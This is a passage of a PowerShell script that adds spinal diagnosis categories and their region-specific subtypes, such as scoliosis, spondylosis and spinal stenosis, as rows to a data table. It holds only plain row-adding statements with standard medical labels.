$DiagnosisList.Rows.Add("Postural lordosis","Postural lordosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Postural lordosis","Postural lordosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Postural lordosis","Postural lordosis, lumbar region") + $null = $DiagnosisList.Rows.Add("Postural lordosis","Postural lordosis, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Lordosis, unspecified","Lordosis, unspecified, site unspecified") + $null = $DiagnosisList.Rows.Add("Lordosis, unspecified","Lordosis, unspecified, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Lordosis, unspecified","Lordosis, unspecified, lumbar region") + $null = $DiagnosisList.Rows.Add("Lordosis, unspecified","Lordosis, unspecified, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Infantile idiopathic scoliosis","Infantile idiopathic scoliosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Infantile idiopathic scoliosis","Infantile idiopathic scoliosis, cervical region") + $null = $DiagnosisList.Rows.Add("Infantile idiopathic scoliosis","Infantile idiopathic scoliosis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Infantile idiopathic scoliosis","Infantile idiopathic scoliosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Infantile idiopathic scoliosis","Infantile idiopathic scoliosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Infantile idiopathic scoliosis","Infantile idiopathic scoliosis, lumbar region") + $null = $DiagnosisList.Rows.Add("Infantile idiopathic scoliosis","Infantile idiopathic scoliosis, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Infantile idiopathic scoliosis","Infantile idiopathic scoliosis, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Juvenile idiopathic scoliosis","Juvenile idiopathic scoliosis, cervical region") + $null = $DiagnosisList.Rows.Add("Juvenile idiopathic scoliosis","Juvenile idiopathic scoliosis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Juvenile idiopathic scoliosis","Juvenile idiopathic scoliosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Juvenile idiopathic scoliosis","Juvenile idiopathic scoliosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Juvenile idiopathic scoliosis","Juvenile idiopathic scoliosis, lumbar region") + $null = $DiagnosisList.Rows.Add("Juvenile idiopathic scoliosis","Juvenile idiopathic scoliosis, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Juvenile idiopathic scoliosis","Juvenile idiopathic scoliosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Adolescent scoliosis","Adolescent idiopathic scoliosis, cervical region") + $null = $DiagnosisList.Rows.Add("Adolescent scoliosis","Adolescent idiopathic scoliosis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Adolescent scoliosis","Adolescent idiopathic scoliosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Adolescent scoliosis","Adolescent idiopathic scoliosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Adolescent scoliosis","Adolescent idiopathic scoliosis, lumbar region") + $null = $DiagnosisList.Rows.Add("Adolescent scoliosis","Adolescent idiopathic scoliosis, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Adolescent scoliosis","Adolescent idiopathic scoliosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Other idiopathic scoliosis","Other idiopathic scoliosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Other idiopathic scoliosis","Other idiopathic scoliosis, cervical region") + $null = $DiagnosisList.Rows.Add("Other idiopathic scoliosis","Other idiopathic scoliosis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other idiopathic scoliosis","Other idiopathic scoliosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Other idiopathic scoliosis","Other idiopathic scoliosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other idiopathic scoliosis","Other idiopathic scoliosis, lumbar region") + $null = $DiagnosisList.Rows.Add("Other idiopathic scoliosis","Other idiopathic scoliosis, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Thoracogenic scoliosis","Thoracogenic scoliosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Thoracogenic scoliosis","Thoracogenic scoliosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Thoracogenic scoliosis","Thoracogenic scoliosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Neuromuscular scoliosis","Neuromuscular scoliosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Neuromuscular scoliosis","Neuromuscular scoliosis, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Neuromuscular scoliosis","Neuromuscular scoliosis, cervical region") + $null = $DiagnosisList.Rows.Add("Neuromuscular scoliosis","Neuromuscular scoliosis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Neuromuscular scoliosis","Neuromuscular scoliosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Neuromuscular scoliosis","Neuromuscular scoliosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Neuromuscular scoliosis","Neuromuscular scoliosis, lumbar region") + $null = $DiagnosisList.Rows.Add("Neuromuscular scoliosis","Neuromuscular scoliosis, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Other secondary scoliosis","Other secondary scoliosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Other secondary scoliosis","Other secondary scoliosis, cervical region") + $null = $DiagnosisList.Rows.Add("Other secondary scoliosis","Other secondary scoliosis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other secondary scoliosis","Other secondary scoliosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Other secondary scoliosis","Other secondary scoliosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other secondary scoliosis","Other secondary scoliosis, lumbar region") + $null = $DiagnosisList.Rows.Add("Other secondary scoliosis","Other secondary scoliosis, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Other forms of scoliosis","Other forms of scoliosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Other forms of scoliosis","Other forms of scoliosis, cervical region") + $null = $DiagnosisList.Rows.Add("Other forms of scoliosis","Other forms of scoliosis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other forms of scoliosis","Other forms of scoliosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Other forms of scoliosis","Other forms of scoliosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other forms of scoliosis","Other forms of scoliosis, lumbar region") + $null = $DiagnosisList.Rows.Add("Other forms of scoliosis","Other forms of scoliosis, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Scoliosis, unspecified","Scoliosis, unspecified") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of spine","Juvenile osteochondrosis of spine, site unspecified") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of spine","Juvenile osteochondrosis of spine, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of spine","Juvenile osteochondrosis of spine, cervical region") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of spine","Juvenile osteochondrosis of spine, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of spine","Juvenile osteochondrosis of spine, thoracic region") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of spine","Juvenile osteochondrosis of spine, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of spine","Juvenile osteochondrosis of spine, lumbar region") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of spine","Juvenile osteochondrosis of spine, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of spine","Juvenile osteochondrosis of spine, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Juvenile osteochondrosis of spine","Juvenile osteochondrosis of spine, multiple sites in spine") + $null = $DiagnosisList.Rows.Add("Adult osteochondrosis of spine","Adult osteochondrosis of spine, site unspecified") + $null = $DiagnosisList.Rows.Add("Adult osteochondrosis of spine","Adult osteochondrosis of spine, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Adult osteochondrosis of spine","Adult osteochondrosis of spine, cervical region") + $null = $DiagnosisList.Rows.Add("Adult osteochondrosis of spine","Adult osteochondrosis of spine, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Adult osteochondrosis of spine","Adult osteochondrosis of spine, thoracic region") + $null = $DiagnosisList.Rows.Add("Adult osteochondrosis of spine","Adult osteochondrosis of spine, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Adult osteochondrosis of spine","Adult osteochondrosis of spine, lumbar region") + $null = $DiagnosisList.Rows.Add("Adult osteochondrosis of spine","Adult osteochondrosis of spine, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Adult osteochondrosis of spine","Adult osteochondrosis of spine, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Adult osteochondrosis of spine","Adult osteochondrosis of spine, multiple sites in spine") + $null = $DiagnosisList.Rows.Add("Spinal osteochondrosis, unspecified","Spinal osteochondrosis, unspecified") + $null = $DiagnosisList.Rows.Add("Spondylolysis","Spondylolysis, site unspecified") + $null = $DiagnosisList.Rows.Add("Spondylolysis","Spondylolysis, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Spondylolysis","Spondylolysis, cervical region") + $null = $DiagnosisList.Rows.Add("Spondylolysis","Spondylolysis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Spondylolysis","Spondylolysis, thoracic region") + $null = $DiagnosisList.Rows.Add("Spondylolysis","Spondylolysis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Spondylolysis","Spondylolysis, lumbar region") + $null = $DiagnosisList.Rows.Add("Spondylolysis","Spondylolysis, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Spondylolysis","Spondylolysis, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Spondylolysis","Spondylolysis, multiple sites in spine") + $null = $DiagnosisList.Rows.Add("Spondylolisthesis","Spondylolisthesis, site unspecified") + $null = $DiagnosisList.Rows.Add("Spondylolisthesis","Spondylolisthesis, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Spondylolisthesis","Spondylolisthesis, cervical region") + $null = $DiagnosisList.Rows.Add("Spondylolisthesis","Spondylolisthesis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Spondylolisthesis","Spondylolisthesis, thoracic region") + $null = $DiagnosisList.Rows.Add("Spondylolisthesis","Spondylolisthesis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Spondylolisthesis","Spondylolisthesis, lumbar region") + $null = $DiagnosisList.Rows.Add("Spondylolisthesis","Spondylolisthesis, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Spondylolisthesis","Spondylolisthesis, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Spondylolisthesis","Spondylolisthesis, multiple sites in spine") + $null = $DiagnosisList.Rows.Add("Fusion of spine","Fusion of spine, site unspecified") + $null = $DiagnosisList.Rows.Add("Fusion of spine","Fusion of spine, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Fusion of spine","Fusion of spine, cervical region") + $null = $DiagnosisList.Rows.Add("Fusion of spine","Fusion of spine, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Fusion of spine","Fusion of spine, thoracic region") + $null = $DiagnosisList.Rows.Add("Fusion of spine","Fusion of spine, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Fusion of spine","Fusion of spine, lumbar region") + $null = $DiagnosisList.Rows.Add("Fusion of spine","Fusion of spine, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Fusion of spine","Fusion of spine, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Recurrent atlantoaxial dislocation with myelopathy","Recurrent atlantoaxial dislocation with myelopathy") + $null = $DiagnosisList.Rows.Add("Other recurrent atlantoaxial dislocation","Other recurrent atlantoaxial dislocation") + $null = $DiagnosisList.Rows.Add("Other recurrent vertebral dislocation","Other recurrent vertebral dislocation, cervical region") + $null = $DiagnosisList.Rows.Add("Other recurrent vertebral dislocation","Other recurrent vertebral dislocation, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other recurrent vertebral dislocation","Other recurrent vertebral dislocation, thoracic region") + $null = $DiagnosisList.Rows.Add("Other recurrent vertebral dislocation","Other recurrent vertebral dislocation, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other recurrent vertebral dislocation","Other recurrent vertebral dislocation, lumbar region") + $null = $DiagnosisList.Rows.Add("Other recurrent vertebral dislocation","Other recurrent vertebral dislocation, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Other recurrent vertebral dislocation","Other recurrent vertebral dislocation, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Other recurrent vertebral dislocation","Other recurrent vertebral dislocation, site unspecified") + $null = $DiagnosisList.Rows.Add("Torticollis","Torticollis") + $null = $DiagnosisList.Rows.Add("Other specified deforming dorsopathies","Other specified deforming dorsopathies, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Other specified deforming dorsopathies","Other specified deforming dorsopathies, cervical region") + $null = $DiagnosisList.Rows.Add("Other specified deforming dorsopathies","Other specified deforming dorsopathies, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other specified deforming dorsopathies","Other specified deforming dorsopathies, thoracic region") + $null = $DiagnosisList.Rows.Add("Other specified deforming dorsopathies","Other specified deforming dorsopathies, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other specified deforming dorsopathies","Other specified deforming dorsopathies, lumbar region") + $null = $DiagnosisList.Rows.Add("Other specified deforming dorsopathies","Other specified deforming dorsopathies, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Other specified deforming dorsopathies","Other specified deforming dorsopathies, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Other specified deforming dorsopathies","Other specified deforming dorsopathies, site unspecified") + $null = $DiagnosisList.Rows.Add("Deforming dorsopathy, unspecified","Deforming dorsopathy, unspecified") + $null = $DiagnosisList.Rows.Add("Ankylosing spondylitis","Ankylosing spondylitis of multiple sites in spine") + $null = $DiagnosisList.Rows.Add("Ankylosing spondylitis","Ankylosing spondylitis of occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Ankylosing spondylitis","Ankylosing spondylitis of cervical region") + $null = $DiagnosisList.Rows.Add("Ankylosing spondylitis","Ankylosing spondylitis of cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Ankylosing spondylitis","Ankylosing spondylitis of thoracic region") + $null = $DiagnosisList.Rows.Add("Ankylosing spondylitis","Ankylosing spondylitis of thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Ankylosing spondylitis","Ankylosing spondylitis lumbar region") + $null = $DiagnosisList.Rows.Add("Ankylosing spondylitis","Ankylosing spondylitis of lumbosacral region") + $null = $DiagnosisList.Rows.Add("Ankylosing spondylitis","Ankylosing spondylitis sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Ankylosing spondylitis","Ankylosing spondylitis of unspecified sites in spine") + $null = $DiagnosisList.Rows.Add("Spinal enthesopathy","Spinal enthesopathy, site unspecified") + $null = $DiagnosisList.Rows.Add("Spinal enthesopathy","Spinal enthesopathy, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Spinal enthesopathy","Spinal enthesopathy, cervical region") + $null = $DiagnosisList.Rows.Add("Spinal enthesopathy","Spinal enthesopathy, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Spinal enthesopathy","Spinal enthesopathy, thoracic region") + $null = $DiagnosisList.Rows.Add("Spinal enthesopathy","Spinal enthesopathy, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Spinal enthesopathy","Spinal enthesopathy, lumbar region") + $null = $DiagnosisList.Rows.Add("Spinal enthesopathy","Spinal enthesopathy, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Spinal enthesopathy","Spinal enthesopathy, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Spinal enthesopathy","Spinal enthesopathy, multiple sites in spine") + $null = $DiagnosisList.Rows.Add("Sacroiliitis, not elsewhere classified","Sacroiliitis, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Osteomyelitis of vertebra","Osteomyelitis of vertebra, site unspecified") + $null = $DiagnosisList.Rows.Add("Osteomyelitis of vertebra","Osteomyelitis of vertebra, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Osteomyelitis of vertebra","Osteomyelitis of vertebra, cervical region") + $null = $DiagnosisList.Rows.Add("Osteomyelitis of vertebra","Osteomyelitis of vertebra, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Osteomyelitis of vertebra","Osteomyelitis of vertebra, thoracic region") + $null = $DiagnosisList.Rows.Add("Osteomyelitis of vertebra","Osteomyelitis of vertebra, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Osteomyelitis of vertebra","Osteomyelitis of vertebra, lumbar region") + $null = $DiagnosisList.Rows.Add("Osteomyelitis of vertebra","Osteomyelitis of vertebra, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Osteomyelitis of vertebra","Osteomyelitis of vertebra, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Infection of intervertebral disc (pyogenic)","Infection of intervertebral disc (pyogenic), site unspecified") + $null = $DiagnosisList.Rows.Add("Infection of intervertebral disc (pyogenic)","Infection of intervertebral disc (pyogenic), occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Infection of intervertebral disc (pyogenic)","Infection of intervertebral disc (pyogenic), cervical region") + $null = $DiagnosisList.Rows.Add("Infection of intervertebral disc (pyogenic)","Infection of intervertebral disc (pyogenic), cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Infection of intervertebral disc (pyogenic)","Infection of intervertebral disc (pyogenic), thoracic region") + $null = $DiagnosisList.Rows.Add("Infection of intervertebral disc (pyogenic)","Infection of intervertebral disc (pyogenic), thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Infection of intervertebral disc (pyogenic)","Infection of intervertebral disc (pyogenic), lumbar region") + $null = $DiagnosisList.Rows.Add("Infection of intervertebral disc (pyogenic)","Infection of intervertebral disc (pyogenic), lumbosacral region") + $null = $DiagnosisList.Rows.Add("Infection of intervertebral disc (pyogenic)","Infection of intervertebral disc (pyogenic), sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Infection of intervertebral disc (pyogenic)","Infection of intervertebral disc (pyogenic), multiple sites in spine") + $null = $DiagnosisList.Rows.Add("Discitis, unspecified","Discitis, unspecified, site unspecified") + $null = $DiagnosisList.Rows.Add("Discitis, unspecified","Discitis, unspecified, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Discitis, unspecified","Discitis, unspecified, cervical region") + $null = $DiagnosisList.Rows.Add("Discitis, unspecified","Discitis, unspecified, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Discitis, unspecified","Discitis, unspecified, thoracic region") + $null = $DiagnosisList.Rows.Add("Discitis, unspecified","Discitis, unspecified, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Discitis, unspecified","Discitis, unspecified, lumbar region") + $null = $DiagnosisList.Rows.Add("Discitis, unspecified","Discitis, unspecified, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Discitis, unspecified","Discitis, unspecified, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Discitis, unspecified","Discitis, unspecified, multiple sites in spine") + $null = $DiagnosisList.Rows.Add("Other infective spondylopathies","Other infective spondylopathies, site unspecified") + $null = $DiagnosisList.Rows.Add("Other infective spondylopathies","Other infective spondylopathies, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Other infective spondylopathies","Other infective spondylopathies, cervical region") + $null = $DiagnosisList.Rows.Add("Other infective spondylopathies","Other infective spondylopathies, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other infective spondylopathies","Other infective spondylopathies, thoracic region") + $null = $DiagnosisList.Rows.Add("Other infective spondylopathies","Other infective spondylopathies, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other infective spondylopathies","Other infective spondylopathies, lumbar region") + $null = $DiagnosisList.Rows.Add("Other infective spondylopathies","Other infective spondylopathies, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Other infective spondylopathies","Other infective spondylopathies, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Other infective spondylopathies","Other infective spondylopathies, multiple sites in spine") + $null = $DiagnosisList.Rows.Add("Other specified inflammatory spondylopathies","Other specified inflammatory spondylopathies, site unspecified") + $null = $DiagnosisList.Rows.Add("Other specified inflammatory spondylopathies","Other specified inflammatory spondylopathies, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Other specified inflammatory spondylopathies","Other specified inflammatory spondylopathies, cervical region") + $null = $DiagnosisList.Rows.Add("Other specified inflammatory spondylopathies","Other specified inflammatory spondylopathies, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other specified inflammatory spondylopathies","Other specified inflammatory spondylopathies, thoracic region") + $null = $DiagnosisList.Rows.Add("Other specified inflammatory spondylopathies","Other specified inflammatory spondylopathies, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other specified inflammatory spondylopathies","Other specified inflammatory spondylopathies, lumbar region") + $null = $DiagnosisList.Rows.Add("Other specified inflammatory spondylopathies","Other specified inflammatory spondylopathies, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Other specified inflammatory spondylopathies","Other specified inflammatory spondylopathies, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Other specified inflammatory spondylopathies","Other specified inflammatory spondylopathies, multiple sites in spine") + $null = $DiagnosisList.Rows.Add("Unspecified inflammatory spondylopathy","Unspecified inflammatory spondylopathy, site unspecified") + $null = $DiagnosisList.Rows.Add("Unspecified inflammatory spondylopathy","Unspecified inflammatory spondylopathy, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Unspecified inflammatory spondylopathy","Unspecified inflammatory spondylopathy, cervical region") + $null = $DiagnosisList.Rows.Add("Unspecified inflammatory spondylopathy","Unspecified inflammatory spondylopathy, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Unspecified inflammatory spondylopathy","Unspecified inflammatory spondylopathy, thoracic region") + $null = $DiagnosisList.Rows.Add("Unspecified inflammatory spondylopathy","Unspecified inflammatory spondylopathy, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Unspecified inflammatory spondylopathy","Unspecified inflammatory spondylopathy, lumbar region") + $null = $DiagnosisList.Rows.Add("Unspecified inflammatory spondylopathy","Unspecified inflammatory spondylopathy, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Unspecified inflammatory spondylopathy","Unspecified inflammatory spondylopathy, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Unspecified inflammatory spondylopathy","Unspecified inflammatory spondylopathy, multiple sites in spine") + $null = $DiagnosisList.Rows.Add("Anterior spinal artery compression syndromes","Anterior spinal artery compression syndromes, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Anterior spinal artery compression syndromes","Anterior spinal artery compression syndromes, cervical region") + $null = $DiagnosisList.Rows.Add("Anterior spinal artery compression syndromes","Anterior spinal artery compression syndromes, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Anterior spinal artery compression syndromes","Anterior spinal artery compression syndromes, thoracic region") + $null = $DiagnosisList.Rows.Add("Anterior spinal artery compression syndromes","Anterior spinal artery compression syndromes, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Anterior spinal artery compression syndromes","Anterior spinal artery compression syndromes, lumbar region") + $null = $DiagnosisList.Rows.Add("Anterior spinal artery compression syndromes","Anterior spinal artery compression syndromes, site unspecified") + $null = $DiagnosisList.Rows.Add("Vertebral artery compression syndromes","Vertebral artery compression syndromes, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Vertebral artery compression syndromes","Vertebral artery compression syndromes, cervical region") + $null = $DiagnosisList.Rows.Add("Vertebral artery compression syndromes","Vertebral artery compression syndromes, site unspecified") + $null = $DiagnosisList.Rows.Add("Other spondylosis with myelopathy","Other spondylosis with myelopathy, site unspecified") + $null = $DiagnosisList.Rows.Add("Other spondylosis with myelopathy","Other spondylosis with myelopathy, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Other spondylosis with myelopathy","Other spondylosis with myelopathy, cervical region") + $null = $DiagnosisList.Rows.Add("Other spondylosis with myelopathy","Other spondylosis with myelopathy, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other spondylosis with myelopathy","Other spondylosis with myelopathy, thoracic region") + $null = $DiagnosisList.Rows.Add("Other spondylosis with myelopathy","Other spondylosis with myelopathy, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other spondylosis with myelopathy","Other spondylosis with myelopathy, lumbar region") + $null = $DiagnosisList.Rows.Add("Other spondylosis with radiculopathy","Other spondylosis with radiculopathy, site unspecified") + $null = $DiagnosisList.Rows.Add("Other spondylosis with radiculopathy","Other spondylosis with radiculopathy, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Other spondylosis with radiculopathy","Other spondylosis with radiculopathy, cervical region") + $null = $DiagnosisList.Rows.Add("Other spondylosis with radiculopathy","Other spondylosis with radiculopathy, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other spondylosis with radiculopathy","Other spondylosis with radiculopathy, thoracic region") + $null = $DiagnosisList.Rows.Add("Other spondylosis with radiculopathy","Other spondylosis with radiculopathy, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other spondylosis with radiculopathy","Other spondylosis with radiculopathy, lumbar region") + $null = $DiagnosisList.Rows.Add("Other spondylosis with radiculopathy","Other spondylosis with radiculopathy, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Other spondylosis with radiculopathy","Other spondylosis with radiculopathy, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Spondylosis without myelopathy or radiculopathy","Spondylosis without myelopathy or radiculopathy, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Spondylosis without myelopathy or radiculopathy","Spondylosis without myelopathy or radiculopathy, cervical region") + $null = $DiagnosisList.Rows.Add("Spondylosis without myelopathy or radiculopathy","Spondylosis without myelopathy or radiculopathy, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Spondylosis without myelopathy or radiculopathy","Spondylosis without myelopathy or radiculopathy, thoracic region") + $null = $DiagnosisList.Rows.Add("Spondylosis without myelopathy or radiculopathy","Spondylosis without myelopathy or radiculopathy, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Spondylosis without myelopathy or radiculopathy","Spondylosis without myelopathy or radiculopathy, lumbar region") + $null = $DiagnosisList.Rows.Add("Spondylosis without myelopathy or radiculopathy","Spondylosis without myelopathy or radiculopathy, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Spondylosis without myelopathy or radiculopathy","Spondylosis without myelopathy or radiculopathy, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Spondylosis without myelopathy or radiculopathy","Spondylosis without myelopathy or radiculopathy, site unspecified") + $null = $DiagnosisList.Rows.Add("Other spondylosis","Other spondylosis, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Other spondylosis","Other spondylosis, cervical region") + $null = $DiagnosisList.Rows.Add("Other spondylosis","Other spondylosis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Other spondylosis","Other spondylosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Other spondylosis","Other spondylosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Other spondylosis","Other spondylosis, lumbar region") + $null = $DiagnosisList.Rows.Add("Other spondylosis","Other spondylosis, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Other spondylosis","Other spondylosis, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Other spondylosis","Other spondylosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Spondylosis, unspecified","Spondylosis, unspecified") + $null = $DiagnosisList.Rows.Add("Spinal stenosis","Spinal stenosis, site unspecified") + $null = $DiagnosisList.Rows.Add("Spinal stenosis","Spinal stenosis, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Spinal stenosis","Spinal stenosis, cervical region") + $null = $DiagnosisList.Rows.Add("Spinal stenosis","Spinal stenosis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Spinal stenosis","Spinal stenosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Spinal stenosis","Spinal stenosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Spinal stenosis, lumbar region","Spinal stenosis, lumbar region without neurogenic claudication") + $null = $DiagnosisList.Rows.Add("Spinal stenosis, lumbar region","Spinal stenosis, lumbar region with neurogenic claudication") + $null = $DiagnosisList.Rows.Add("Spinal stenosis, lumbosacral region","Spinal stenosis, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Spinal stenosis, sacral and sacrococcygeal region","Spinal stenosis, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Ankylosing hyperostosis [Forestier]","Ankylosing hyperostosis [Forestier], site unspecified") + $null = $DiagnosisList.Rows.Add("Ankylosing hyperostosis [Forestier]","Ankylosing hyperostosis [Forestier], occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Ankylosing hyperostosis [Forestier]","Ankylosing hyperostosis [Forestier], cervical region") + $null = $DiagnosisList.Rows.Add("Ankylosing hyperostosis [Forestier]","Ankylosing hyperostosis [Forestier], cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Ankylosing hyperostosis [Forestier]","Ankylosing hyperostosis [Forestier], thoracic region") + $null = $DiagnosisList.Rows.Add("Ankylosing hyperostosis [Forestier]","Ankylosing hyperostosis [Forestier], thoracolumbar region") + $null = 